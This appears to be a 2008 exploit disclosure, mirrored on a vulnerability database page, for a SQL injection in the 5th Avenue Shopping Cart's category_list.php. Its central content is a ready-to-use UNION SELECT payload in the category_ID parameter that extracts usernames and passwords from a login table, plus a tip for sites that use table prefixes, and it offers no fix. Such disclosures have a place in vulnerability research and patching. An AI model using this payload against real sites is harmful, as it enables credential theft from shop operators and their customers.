5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability

🗓️ 19 Apr 2008 00:00:00Reported by RootType

5th Avenue Shopping Cart SQL Injection Vulnerability. Greetz: AurA, Kinglet, NUL


                                                Aria-Security&nbsp;Team&nbsp;(Persian&nbsp;Security&nbsp;Team)
http://Aria-Security.Net&nbsp;(Persian)
http://Aria-Security.com&nbsp;(ENG)
--------------------------------------------
5th&nbsp;avenue&nbsp;Shopping&nbsp;Cart&nbsp;SQL&nbsp;Injection
Greetz:&nbsp;AurA,&nbsp;Kinglet,&nbsp;NULL


category_list.php?category_ID=-1/**/UNION/**/SELECT/**/1,username,password,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/login/*

note:&nbsp;if&nbsp;error&nbsp;says&nbsp;:table&nbsp;login&nbsp;does&nbsp;not&nbsp;exist&nbsp;the&nbsp;website&nbsp;is&nbsp;using&nbsp;a&nbsp;prefix&nbsp;for&nbsp;tables.


Regards,
The-0utl4w

19 Apr 2008 00:00Current

7.1High risk

Vulners AI Score7.1